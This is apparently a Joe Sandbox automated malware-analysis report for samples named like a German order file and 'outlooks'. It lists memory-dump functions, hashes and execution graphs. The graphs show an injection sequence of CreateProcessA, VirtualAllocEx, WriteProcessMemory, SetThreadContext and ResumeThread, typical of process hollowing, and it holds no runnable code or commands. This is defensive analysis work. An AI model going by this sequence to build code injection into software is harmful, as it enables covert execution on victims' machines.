                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 4f3a13439936c233a61a39ed138d3f3054b468b7819b8f870b77ceb7fca3556e
                                                                            • Instruction ID: 3ff3505ae0b96708bafaaac1d30a8b14d4e40fda4f495457986d923405ca202c
                                                                            • Opcode Fuzzy Hash: 4f3a13439936c233a61a39ed138d3f3054b468b7819b8f870b77ceb7fca3556e
                                                                            • Instruction Fuzzy Hash: D11102B5C046498FDB14DF9AC844BDEFBF5EB88210F10852ED519B7210C379A545CFA5
                                                                            Function 0168D01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493071459.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_168d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1f79183a022a5757264f36f4bb18e1eb474f5c7d33228ae25cfcb616bff2b76
                                                                            • Instruction ID: 521abaf5916a13d1af973c5adc213ffc0e3f016f4a841b039d0362ad4a6e1482
                                                                            • Opcode Fuzzy Hash: d1f79183a022a5757264f36f4bb18e1eb474f5c7d33228ae25cfcb616bff2b76
                                                                            • Instruction Fuzzy Hash: FD210071604304EFDB15EF94DC80B16BB61FB84214F20C669D84A4B382C33AD447CA72
                                                                            Function 0168D006 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493071459.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_168d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bdaa25ecae29b0de6f5768097877fa5ef9b42ecdb68d2ad0b8292cee892f2d3a
                                                                            • Instruction ID: 4e5ce21dac4ff27a1f6eb6748ccd4a4943bec9288eeba0cdc9e4ec6bfd364b77
                                                                            • Opcode Fuzzy Hash: bdaa25ecae29b0de6f5768097877fa5ef9b42ecdb68d2ad0b8292cee892f2d3a
                                                                            • Instruction Fuzzy Hash: 7321D1755083808FCB03CF64C990B05BF71EB46214F28C2DAD8498B2A3C33AD40BCB62

                                                                            Execution Graph

                                                                            Execution Coverage:13.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:18
                                                                            Total number of Limit Nodes:2
                                                                            execution_graph 11711 4b677a8 11712 4b677b2 11711->11712 11714 4b67ca0 11711->11714 11715 4b67cc5 11714->11715 11719 4b67db0 11715->11719 11723 4b67d9f 11715->11723 11720 4b67dd7 11719->11720 11722 4b67eb4 11720->11722 11727 4b679dc 11720->11727 11725 4b67dd7 11723->11725 11724 4b67eb4 11724->11724 11725->11724 11726 4b679dc CreateActCtxA 11725->11726 11726->11724 11728 4b68e40 CreateActCtxA 11727->11728 11730 4b68f03 11728->11730 11731 4b6ebd8 11732 4b6ec20 GetModuleHandleW 11731->11732 11733 4b6ec1a 11731->11733 11734 4b6ec4d 11732->11734 11733->11732

                                                                            Executed Functions

                                                                            Function 04B68E34 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 4b68e34-4b68f01 CreateActCtxA 2 4b68f03-4b68f09 0->2 3 4b68f0a-4b68f64 0->3 2->3 10 4b68f66-4b68f69 3->10 11 4b68f73-4b68f77 3->11 10->11 12 4b68f88 11->12 13 4b68f79-4b68f85 11->13 15 4b68f89 12->15 13->12 15->15
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 04B68EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1744646065.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_4b60000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: NvY
                                                                            • API String ID: 2289755597-808744227
                                                                            • Opcode ID: ad20ce20db0826db25122bc596a38951f7be49d0410a247a2023088488bec84d
                                                                            • Instruction ID: 4e6c774d58a11ec5d3132d3fb552a166e3f242ffcd182b638b79d240d980bb47
                                                                            • Opcode Fuzzy Hash: ad20ce20db0826db25122bc596a38951f7be49d0410a247a2023088488bec84d
                                                                            • Instruction Fuzzy Hash: 4741E1B0C00718CFDB24DFA9D844BDEBBB2BF49714F20846AD409AB250DB756946CF91
                                                                            Function 04B679DC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 16 4b679dc-4b68f01 CreateActCtxA 19 4b68f03-4b68f09 16->19 20 4b68f0a-4b68f64 16->20 19->20 27 4b68f66-4b68f69 20->27 28 4b68f73-4b68f77 20->28 27->28 29 4b68f88 28->29 30 4b68f79-4b68f85 28->30 32 4b68f89 29->32 30->29 32->32
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 04B68EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1744646065.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_4b60000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: NvY
                                                                            • API String ID: 2289755597-808744227
                                                                            • Opcode ID: 537894e6c8d9fe79769bfd1754dd3e0f194648f035ae55d81896399376608d35
                                                                            • Instruction ID: 1c654c3ba82a5e5966725f8b0f6b2d95577a02ab3b50e98f1537d56cb02d747e
                                                                            • Opcode Fuzzy Hash: 537894e6c8d9fe79769bfd1754dd3e0f194648f035ae55d81896399376608d35
                                                                            • Instruction Fuzzy Hash: 1541F2B0C00718CFDB24DFA9C844B9EBBF2BF88704F20846AD409AB250DB756946CF90
                                                                            Function 04B6EBD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 33 4b6ebd8-4b6ec18 34 4b6ec20-4b6ec4b GetModuleHandleW 33->34 35 4b6ec1a-4b6ec1d 33->35 36 4b6ec54-4b6ec68 34->36 37 4b6ec4d-4b6ec53 34->37 35->34 37->36
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04B6EC3E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1744646065.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_4b60000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID: NvY
                                                                            • API String ID: 4139908857-808744227
                                                                            • Opcode ID: 746d960d18bfcd7db6cdf6b395bd0008cba40328773aa7fe063024aadadd801f
                                                                            • Instruction ID: a0d8c56054da56bf6f573256d29b8e23868901924b4df44898826f54c3eca710
                                                                            • Opcode Fuzzy Hash: 746d960d18bfcd7db6cdf6b395bd0008cba40328773aa7fe063024aadadd801f
                                                                            • Instruction Fuzzy Hash: A31110B6C006498FDB20CF9AD844BDEFBF4EB88320F10845AD429A7200D379A545CFA1
                                                                            Function 00ABD01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1678166043.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_abd000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ffa75dea82e247a18f1509550da901237b9676dfd9fd1bd072ebd659e6482f2a
                                                                            • Instruction ID: 173f68509a468054572f4ace5d0f685df1b45c795bca38ae19a1b3770d0cc17a
                                                                            • Opcode Fuzzy Hash: ffa75dea82e247a18f1509550da901237b9676dfd9fd1bd072ebd659e6482f2a
                                                                            • Instruction Fuzzy Hash: 25212271604340EFDB14EF10D8C0B56BB69FB88314F20C569D80A0B287D33AD807CA62
                                                                            Function 00ABD017 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1678166043.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_abd000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
                                                                            • Instruction ID: de245cd2c4acf8431d8fe4adef245de40ac9e127b48ec927564b56edb27168e3
                                                                            • Opcode Fuzzy Hash: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
                                                                            • Instruction Fuzzy Hash: 0E11BB75504280CFCB11DF10D5C4B15BFA2FB84318F28C6AAD84A4B656C33AD84ACBA2

                                                                            Execution Graph

                                                                            Execution Coverage:15.8%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:169
                                                                            Total number of Limit Nodes:5
                                                                            execution_graph 21540 893b891 21541 893b89b 21540->21541 21542 893b95c 21540->21542 21546 893d090 21541->21546 21562 893d0f6 21541->21562 21579 893d080 21541->21579 21547 893d0aa 21546->21547 21559 893d0b2 21547->21559 21595 893d5b3 21547->21595 21603 893d58e 21547->21603 21608 893d8e9 21547->21608 21617 893d3c0 21547->21617 21622 893d5a0 21547->21622 21627 893d882 21547->21627 21632 893d5dc 21547->21632 21636 893d75f 21547->21636 21640 893d7b8 21547->21640 21644 893e014 21547->21644 21649 893d654 21547->21649 21654 893d616 21547->21654 21663 893d6f6 21547->21663 21559->21542 21563 893d084 21562->21563 21565 893d0f9 21562->21565 21564 893d0b2 21563->21564 21566 893d5b3 4 API calls 21563->21566 21567 893d6f6 2 API calls 21563->21567 21568 893d616 4 API calls 21563->21568 21569 893d654 2 API calls 21563->21569 21570 893e014 2 API calls 21563->21570 21571 893d7b8 2 API calls 21563->21571 21572 893d75f 2 API calls 21563->21572 21573 893d5dc 2 API calls 21563->21573 21574 893d882 2 API calls 21563->21574 21575 893d5a0 2 API calls 21563->21575 21576 893d3c0 2 API calls 21563->21576 21577 893d8e9 4 API calls 21563->21577 21578 893d58e 2 API calls 21563->21578 21564->21542 21565->21542 21566->21564 21567->21564 21568->21564 21569->21564 21570->21564 21571->21564 21572->21564 21573->21564 21574->21564 21575->21564 21576->21564 21577->21564 21578->21564 21580 893d090 21579->21580 21581 893d5b3 4 API calls 21580->21581 21582 893d6f6 2 API calls 21580->21582 21583 893d616 4 API calls 21580->21583 21584 893d654 2 API calls 21580->21584 21585 893e014 2 API calls 21580->21585 21586 893d7b8 2 API calls 21580->21586 21587 893d75f 2 API calls 21580->21587 21588 893d5dc 2 API calls 21580->21588 21589 893d882 2 API calls 21580->21589 21590 893d5a0 2 API calls 21580->21590 21591 893d3c0 2 API calls 21580->21591 21592 893d0b2 21580->21592 21593 893d8e9 4 API calls 21580->21593 21594 893d58e 2 API calls 21580->21594 21581->21592 21582->21592 21583->21592 21584->21592 21585->21592 21586->21592 21587->21592 21588->21592 21589->21592 21590->21592 21591->21592 21592->21542 21593->21592 21594->21592 21596 893d5c5 21595->21596 21597 893d80c 21596->21597 21668 893b100 21596->21668 21672 893b118 21596->21672 21676 893b1d1 21597->21676 21680 893b1d8 21597->21680 21598 893dc58 21604 893d9fc 21603->21604 21606 893b1d1 WriteProcessMemory 21604->21606 21607 893b1d8 WriteProcessMemory 21604->21607 21605 893dc01 21606->21605 21607->21605 21609 893d8ef 21608->21609 21610 893d575 21609->21610 21611 893d70d 21609->21611 21692 893ac38 21609->21692 21696 893ac30 21609->21696 21610->21559 21684 893ab88 21611->21684 21688 893ab80 21611->21688 21612 893d722 21612->21559 21618 893d3f3 21617->21618 21700 893b460 21618->21700 21704 893b45b 21618->21704 21623 893d5ad 21622->21623 21625 893ab80 ResumeThread 21623->21625 21626 893ab88 ResumeThread 21623->21626 21624 893d722 21624->21559 21625->21624 21626->21624 21628 893d888 21627->21628 21630 893b1d1 WriteProcessMemory 21628->21630 21631 893b1d8 WriteProcessMemory 21628->21631 21629 893dc58 21630->21629 21631->21629 21708 893e218 21632->21708 21713 893e208 21632->21713 21633 893d5f9 21638 893b1d1 WriteProcessMemory 21636->21638 21639 893b1d8 WriteProcessMemory 21636->21639 21637 893d6a6 21637->21559 21638->21637 21639->21637 21718 893b2c1 21640->21718 21722 893b2c8 21640->21722 21641 893d575 21641->21559 21645 893d475 21644->21645 21645->21644 21647 893b460 CreateProcessA 21645->21647 21648 893b45b CreateProcessA 21645->21648 21646 893d54a 21647->21646 21648->21646 21650 893d65e 21649->21650 21652 893ab80 ResumeThread 21650->21652 21653 893ab88 ResumeThread 21650->21653 21651 893d722 21651->21559 21652->21651 21653->21651 21657 893d61a 21654->21657 21655 893d70d 21661 893ab80 ResumeThread 21655->21661 21662 893ab88 ResumeThread 21655->21662 21656 893d722 21656->21559 21657->21655 21658 893d575 21657->21658 21659 893ac30 Wow64SetThreadContext 21657->21659 21660 893ac38 Wow64SetThreadContext 21657->21660 21658->21559 21659->21657 21660->21657 21661->21656 21662->21656 21664 893d6fc 21663->21664 21666 893ab80 ResumeThread 21664->21666 21667 893ab88 ResumeThread 21664->21667 21665 893d722 21665->21559 21666->21665 21667->21665 21669 893b158 VirtualAllocEx 21668->21669 21671 893b195 21669->21671 21671->21597 21673 893b158 VirtualAllocEx 21672->21673 21675 893b195 21673->21675 21675->21597 21677 893b1d8 WriteProcessMemory 21676->21677 21679 893b277 21677->21679 21679->21598 21681 893b220 WriteProcessMemory 21680->21681 21683 893b277 21681->21683 21683->21598 21685 893abc8 ResumeThread 21684->21685 21687 893abf9 21685->21687 21687->21612 21689 893ab88 ResumeThread 21688->21689 21691 893abf9 21689->21691 21691->21612 21693 893ac7d Wow64SetThreadContext 21692->21693 21695 893acc5 21693->21695 21695->21609 21697 893ac7d Wow64SetThreadContext 21696->21697 21699 893acc5 21697->21699 21699->21609 21701 893b4e9 21700->21701 21701->21701 21702 893b64e CreateProcessA 21701->21702 21703 893b6ab 21702->21703 21705 893b4e9 21704->21705 21705->21705 21706 893b64e CreateProcessA 21705->21706 21707 893b6ab 21706->21707 21709 893e22d 21708->21709 21711 893ac30 Wow64SetThreadContext 21709->21711 21712 893ac38 Wow64SetThreadContext 21709->21712 21710 893e243 21710->21633 21711->21710 21712->21710 21714 893e218 21713->21714 21716 893ac30 Wow64SetThreadContext 21714->21716 21717 893ac38 Wow64SetThreadContext 21714->21717 21715 893e243 21715->21633 21716->21715 21717->21715 21719 893b2c8 ReadProcessMemory 21718->21719 21721 893b357 21719->21721 21721->21641 21723 893b313 ReadProcessMemory 21722->21723 21725 893b357 21723->21725 21725->21641 21726 32177a8 21727 32177b2 21726->21727 21729 3217ca0 21726->21729 21730 3217cc5 21729->21730 21734 3217db0 21730->21734 21738 3217d9f 21730->21738 21736 3217dd7 21734->21736 21735 3217eb4 21735->21735 21736->21735 21742 32179dc 21736->21742 21740 3217db0 21738->21740 21739 3217eb4 21740->21739 21741 32179dc CreateActCtxA 21740->21741 21741->21739 21743 3218e40 CreateActCtxA 21742->21743 21745 3218f03 21743->21745 21745->21745 21754 321ebd8 21755 321ec20 GetModuleHandleW 21754->21755 21756 321ec1a 21754->21756 21757 321ec4d 21755->21757 21756->21755 21746 893e288 21747 893e413 21746->21747 21749 893e2ae 21746->21749 21749->21747 21750 893adf4 21749->21750 21751 893adf9 PostMessageW 21750->21751 21753 893e574 21751->21753 21753->21749

                                                                            Executed Functions

                                                                            Function 0893B45B Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 893b45b-893b4f5 2 893b4f7-893b501 0->2 3 893b52e-893b54e 0->3 2->3 4 893b503-893b505 2->4 8 893b550-893b55a 3->8 9 893b587-893b5b6 3->9 6 893b507-893b511 4->6 7 893b528-893b52b 4->7 10 893b513 6->10 11 893b515-893b524 6->11 7->3 8->9 12 893b55c-893b55e 8->12 19 893b5b8-893b5c2 9->19 20 893b5ef-893b6a9 CreateProcessA 9->20 10->11 11->11 13 893b526 11->13 14 893b581-893b584 12->14 15 893b560-893b56a 12->15 13->7 14->9 17 893b56e-893b57d 15->17 18 893b56c 15->18 17->17 21 893b57f 17->21 18->17 19->20 22 893b5c4-893b5c6 19->22 31 893b6b2-893b738 20->31 32 893b6ab-893b6b1 20->32 21->14 24 893b5e9-893b5ec 22->24 25 893b5c8-893b5d2 22->25 24->20 26 893b5d6-893b5e5 25->26 27 893b5d4 25->27 26->26 28 893b5e7 26->28 27->26 28->24 42 893b73a-893b73e 31->42 43 893b748-893b74c 31->43 32->31 42->43 46 893b740 42->46 44 893b74e-893b752 43->44 45 893b75c-893b760 43->45 44->45 47 893b754 44->47 48 893b762-893b766 45->48 49 893b770-893b774 45->49 46->43 47->45 48->49 50 893b768 48->50 51 893b786-893b78d 49->51 52 893b776-893b77c 49->52 50->49 53 893b7a4 51->53 54 893b78f-893b79e 51->54 52->51 55 893b7a5 53->55 54->53 55->55
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0893B696
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 4d3de507bf32e2a99f322765417f7ba55b9144f8c5fdcf98dc3c42be4f1974e6
                                                                            • Instruction ID: ad1b2edf8d1c998fbf3c0d93a017b0e1a8e4b4b4317ead6b6aae0633431fa379
                                                                            • Opcode Fuzzy Hash: 4d3de507bf32e2a99f322765417f7ba55b9144f8c5fdcf98dc3c42be4f1974e6
                                                                            • Instruction Fuzzy Hash: CAA14C71D00329CFEB20DF68C8417EEBBB2BF48725F1485A9E809A7240DB749985CF91
                                                                            Function 0893B460 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 57 893b460-893b4f5 59 893b4f7-893b501 57->59 60 893b52e-893b54e 57->60 59->60 61 893b503-893b505 59->61 65 893b550-893b55a 60->65 66 893b587-893b5b6 60->66 63 893b507-893b511 61->63 64 893b528-893b52b 61->64 67 893b513 63->67 68 893b515-893b524 63->68 64->60 65->66 69 893b55c-893b55e 65->69 76 893b5b8-893b5c2 66->76 77 893b5ef-893b6a9 CreateProcessA 66->77 67->68 68->68 70 893b526 68->70 71 893b581-893b584 69->71 72 893b560-893b56a 69->72 70->64 71->66 74 893b56e-893b57d 72->74 75 893b56c 72->75 74->74 78 893b57f 74->78 75->74 76->77 79 893b5c4-893b5c6 76->79 88 893b6b2-893b738 77->88 89 893b6ab-893b6b1 77->89 78->71 81 893b5e9-893b5ec 79->81 82 893b5c8-893b5d2 79->82 81->77 83 893b5d6-893b5e5 82->83 84 893b5d4 82->84 83->83 85 893b5e7 83->85 84->83 85->81 99 893b73a-893b73e 88->99 100 893b748-893b74c 88->100 89->88 99->100 103 893b740 99->103 101 893b74e-893b752 100->101 102 893b75c-893b760 100->102 101->102 104 893b754 101->104 105 893b762-893b766 102->105 106 893b770-893b774 102->106 103->100 104->102 105->106 107 893b768 105->107 108 893b786-893b78d 106->108 109 893b776-893b77c 106->109 107->106 110 893b7a4 108->110 111 893b78f-893b79e 108->111 109->108 112 893b7a5 110->112 111->110 112->112
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0893B696
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 04b75617347273cadca16b7cd289c28bbdf830cdcb13cb815a085bc2248b6db9
                                                                            • Instruction ID: 1eb605b2d548d836d46fd244cdc69ae13baa9fa3ba28f2049ac9aed30c401d94
                                                                            • Opcode Fuzzy Hash: 04b75617347273cadca16b7cd289c28bbdf830cdcb13cb815a085bc2248b6db9
                                                                            • Instruction Fuzzy Hash: CD914B71D00329CFEB20DF68C8417EEBBB6BF48725F1485A9E809A7240DB749985CF91
                                                                            Function 03218E34 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 114 3218e34-3218e3e 115 3218e40-3218f01 CreateActCtxA 114->115 117 3218f03-3218f09 115->117 118 3218f0a-3218f64 115->118 117->118 125 3218f73-3218f77 118->125 126 3218f66-3218f69 118->126 127 3218f79-3218f85 125->127 128 3218f88 125->128 126->125 127->128 130 3218f89 128->130 130->130
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 03218EF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1554343377.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_3210000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 32bea05ed6983c17be85602544bd387a8f3f38c6a0a0f008b044d124afc025a7
                                                                            • Instruction ID: b1cacd81f3bd293087b85366aa447860d5df9359a4efd7d75097b1db7d2b2f21
                                                                            • Opcode Fuzzy Hash: 32bea05ed6983c17be85602544bd387a8f3f38c6a0a0f008b044d124afc025a7
                                                                            • Instruction Fuzzy Hash: B641BFB1C00719CFDB24CFA9C884B9DBBF6BF49704F24805AD408AB251DB755946CF91
                                                                            Function 032179DC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 131 32179dc-3218f01 CreateActCtxA 134 3218f03-3218f09 131->134 135 3218f0a-3218f64 131->135 134->135 142 3218f73-3218f77 135->142 143 3218f66-3218f69 135->143 144 3218f79-3218f85 142->144 145 3218f88 142->145 143->142 144->145 147 3218f89 145->147 147->147
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 03218EF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1554343377.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_3210000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 153fc30a9c1d78475f3bd55ef8b52e6475863bf9ff94bcdb38c76d0310dd07ee
                                                                            • Instruction ID: 51f07c1559c0dfe9bd4ef4ef3bf4070ae0c573687f1974b3563fea8afbe52966
                                                                            • Opcode Fuzzy Hash: 153fc30a9c1d78475f3bd55ef8b52e6475863bf9ff94bcdb38c76d0310dd07ee
                                                                            • Instruction Fuzzy Hash: 7641C0B0C10719CFDB24CFA9C984B8EBBF6BF49704F24806AD408AB251DB756946CF91
                                                                            Function 0893B1D1 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 148 893b1d1-893b226 151 893b236-893b275 WriteProcessMemory 148->151 152 893b228-893b234 148->152 154 893b277-893b27d 151->154 155 893b27e-893b2ae 151->155 152->151 154->155
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0893B268
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 32a5e651f5a43813749a04f57de7ab0cd1c89b04ff4d52ccaa01f6986681874e
                                                                            • Instruction ID: e649f3b82ac37e9048bc4f91d0de42cd4f8d5ff52e5e3c4d8e7fa1b5fec77e44
                                                                            • Opcode Fuzzy Hash: 32a5e651f5a43813749a04f57de7ab0cd1c89b04ff4d52ccaa01f6986681874e
                                                                            • Instruction Fuzzy Hash: 8C2166719003599FCF10DFAAC881BDEBBF5FF48320F50882AE919A7240D7789944CBA1
                                                                            Function 0893B1D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 159 893b1d8-893b226 161 893b236-893b275 WriteProcessMemory 159->161 162 893b228-893b234 159->162 164 893b277-893b27d 161->164 165 893b27e-893b2ae 161->165 162->161 164->165
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0893B268
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 610bd758d0488dfe3d2aeb3ebdeb4bb5f7727aba7db9f11ca7ec35d820186a5e
                                                                            • Instruction ID: ccee0e42a665e4fe44b5d433cdb13be8d6c92d177e86749175fd4e94236d7caf
                                                                            • Opcode Fuzzy Hash: 610bd758d0488dfe3d2aeb3ebdeb4bb5f7727aba7db9f11ca7ec35d820186a5e
                                                                            • Instruction Fuzzy Hash: 542125719003599FDB10DFAAC885BDEBBF5FF48320F50882AE919A7240D7799940CBA4
                                                                            Function 0893AC30 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 169 893ac30-893ac83 171 893ac93-893acc3 Wow64SetThreadContext 169->171 172 893ac85-893ac91 169->172 174 893acc5-893accb 171->174 175 893accc-893acfc 171->175 172->171 174->175
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0893ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 68a90478e961f8dc90c92605eb18bc9da61511efe3764c27e82700b2af24f59e
                                                                            • Instruction ID: 82ca8395a9d1c504f52981ee162fd125bef8c8eb73429d1b0e6521641212bd46
                                                                            • Opcode Fuzzy Hash: 68a90478e961f8dc90c92605eb18bc9da61511efe3764c27e82700b2af24f59e
                                                                            • Instruction Fuzzy Hash: 662143719007198FDB10DFAAC885BEEBBF5EF88624F10842AD459A7240CB789945CFA1
                                                                            Function 0893B2C1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 179 893b2c1-893b355 ReadProcessMemory 183 893b357-893b35d 179->183 184 893b35e-893b38e 179->184 183->184
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0893B348
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
